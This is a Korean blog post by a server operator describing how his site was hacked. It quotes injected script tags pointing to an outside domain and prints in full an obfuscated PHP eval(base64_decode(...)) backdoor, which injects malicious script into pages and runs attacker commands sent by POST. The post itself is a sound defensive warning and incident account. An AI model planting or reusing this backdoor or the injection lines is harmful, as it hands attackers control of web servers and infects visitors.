Skip to content
조회 수 22012 추천 수 0 댓글 0
?

단축키

Prev이전 문서

Next다음 문서

크게 작게 위로 아래로 댓글로 가기 인쇄 첨부
?

단축키

Prev이전 문서

Next다음 문서

크게 작게 위로 아래로 댓글로 가기 인쇄 첨부

[해킹차단] 이런창이 뜨는 사이트들 정말 조심하길 바란다.

혹시 서버를 운영중이시라면 아래의 글을 참고로 하여 자신의 컴퓨터를 점검해주세요.

 

호기심에라도 아래의 코드는 클릭하지 마시고, 일부러 링크가 안되게 ..... 을 추가 시켰습니다.

무리하게 들어가지 말아주세요. ^^;;

 

구글크롬이 그나마 안전한 브라우저라 생각되어 웹검색은 크롬으로 하고 있는데, 구글크롬에서 상당히 자주볼 수 있는 국내 웹사이트들...

 

특히나 뉴스사이트들이다.

 

일단 아래의 경고메시지들은 해당사이트에 악성코드를 제공하는 이미지파일이나 스크립트 문구가 있으면 나타나는 문구이다.

 

 

3.JPG

 

헌데 어느날 갑자기 내 사이트에서도 저런 문구가 나타나기 시작했다.

처음에는 대수롭지 않게 보다가 자꾸 찜찜,,,

 

웹페이지 소스를 뒤져보니,

<script src="http://thaizucht.de/gfx/......thgr_prc_log.php ></script>

 

등이 삽입되어 있는것이 아닌가?

 

어떤 노무새퀴?가 이런짓을???

 

 

우선 웹관련 파일인 *.js *.php *.htm 파일들에 thaizucht.de와 스팸모음 자료들을 토대로 하나씩 찾기 시작했다.

 

 

common/js폴더의 파일을 비롯 *.js 파일에

document.write('<script src="http://thaizucht.de/gfx/......thgr_prc_log.php ><\/script>);

라고 254개의 파일에 넣어놨고,

 

htm, html 파일에는
<script src="http://thaizucht.de/gfx/......thgr_prc_log.php ></script>

라고 7개의 파일에 넣어놨고,

 

php 파일에는

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnbGxrcycpKXtmdW5jdGlvbiBsbGtzKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDNSb1lXbDZkV05vZEM1a1pTOW5abmd2ZEdobmNsOXdjbU5mYkc5bkxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBsbGtzMigkYSwkYiwkYywkZCl7Z2xvYmFsJGxsa3MxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRsbGtzMSkpY2FsbF91c2VyX2Z1bmMoJGxsa3MxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdsbGtzJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnbGxrcycpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRsbGtzbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignbGxrczInKSkhPSdsbGtzMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>

라는 코드를 16개의 파일에 넣어놨다.


전체적으로 thaizucht.de 이 단어가 들어간 사이트를 추적해보았다,,,

9개가 더 발견..

 

4.JPG

 

 

 

 

이후 바이러스 검사까지 완료!

 

 

5.JPG

 

 

 

 

하루가 지나고 다음날,,,

 

허걱~~~

 

또 악성코드가???

 

우찌된 일이지?

 

 

아파치웹서버로그를 별도로 저장하지 않는터라, 다른 로그기록을 찾아보았다.

 

우선 파일부터 검색해봐야겠다.

 

혹시 날짜가 어떻게 바뀌었나?

 

분명 코드를 수정했으면 날짜가 바꼇을 터!!!~

 

오전 8시까지만해도 괜찮던것이 오후 8:52 ~ 8:53분에 일괄적으로 코드 수정됨...


파일 날짜가 이 시간대로 바뀐것들은 죄다 코드가 수정되어 있었고, 분명 Telnet과 FTP도 껏는데 우째 다시 실행되어 있다?

 

재부팅된 시간이 언제인가를 정확히 파악하기 위해서 PhpMyadmin의 상태를 보았다.

 

"이 MySQL 서버는 0 days, 16 hours, 48 minutes and 14 seconds 동안 구동되었습니다.
구동 시작날짜는 10-05-03 15:15 입니다."

 

어제 마지막으로 건드린 시간이었다.

결국 재부팅은 되지 않았으며, 일괄자료를 수정한 것으로 보이는데, 시간대가 비슷한 시간대인것으로 보아 FTP 로 접속한 듯...~~~ 음...,,

 

내 FTP비밀번호가 노출되었나?

일단 FTP서버도 차단시키고, 아이디도 몽땅 바꿨다.

 

다시 하루가 지나봐야 할 듯한데...

음,,, 여러분들의 서버에 혹시 침입자가 있지 않은지 확인해보세요.

위의 내용들은 구글 검색사이트에서 조차 나오지 않더군요.

 

알려지지 않은 또는 서버 운영자들도 잘 모르고 있었던 부분이 아닌가 싶네요.

 

 

 

 

로그인 후 댓글쓰기가 가능합니다.

?

List of Articles
번호 분류 제목 날짜 조회 수
837 AutoHotKey autohotkey) postmessage mouse control 13 2012.02.22 28627
836 컴퓨터잡담 DIV 라운드박스 쉽게 만들자. 1 1 file 2009.07.24 28591
835 컴퓨터잡담 트랜지스터의 종류와 특정 2013.10.12 28522
834 WindowsTip 네트워크 무선연결이 안될 때의 점검 방법 file 2013.03.12 28251
833 컴퓨터잡담 php 에서 mysql 제어하기 2009.11.28 28199
832 컴퓨터잡담 MySQL FEDERATED / InnoDB is disabled, myint64.dll 오류 어찌하오리 4 2010.04.19 27705
831 AutoHotKey [COM] 자바스크립트 / DOM / HTML 웹페이지 컨트롤 3 2011.02.12 27281
830 프로세스 Searchindexer.exe 제거하기 1 2011.03.18 27259
829 컴퓨터잡담 mysql 접속에러시 재부팅 하는 배치파일 2009.11.24 26667
828 Excel [excel] GET.CELL사용법 8 2012.07.16 26573
827 컴퓨터잡담 부팅시마다 체크디스크 실행되는 경우 설정방법 2010.08.21 26563
826 AutoHotKey [AUTOHOTKEY] FTP 제어 file 2011.02.04 25246
825 Excel 엑셀) 피벗테이블 원본데이터 영역범위 수정방법 1 2 file 2012.03.06 25071
824 컴퓨터잡담 무선공유기(AP) 채널간섭 해결하기 file 2013.08.17 25044
823 컴퓨터잡담 Excel VBA (1): 셀 선택 및 변수 및 비활성시트 컨트롤하기 3 2011.10.24 24995
822 컴퓨터잡담 자바스크립트 변수를 php로 옮기기 2010.02.03 24959
821 WindowsTip Windows-XP 의 [Prefetch] 폴더에 대하여[C:\WINDOWS\Prefetch] 2013.12.04 24630
820 컴퓨터잡담 인터넷 익스플러러 속도 향샹을 위한 팁 1 file 2012.02.25 24571
819 컴퓨터잡담 티맥스OS 무료배포도 판매 수익의 세배이상 가능하다 2 2009.07.26 24565
818 Excel 현재 Excel 파일 이름을 셀에 삽입 2 2012.09.17 24551
Board Pagination Prev 1 ... 3 4 5 6 7 ... 46 Next
/ 46

http://urin79.com

우린친구블로그

sketchbook5, 스케치북5

sketchbook5, 스케치북5

나눔글꼴 설치 안내


이 PC에는 나눔글꼴이 설치되어 있지 않습니다.

이 사이트를 나눔글꼴로 보기 위해서는
나눔글꼴을 설치해야 합니다.

설치 취소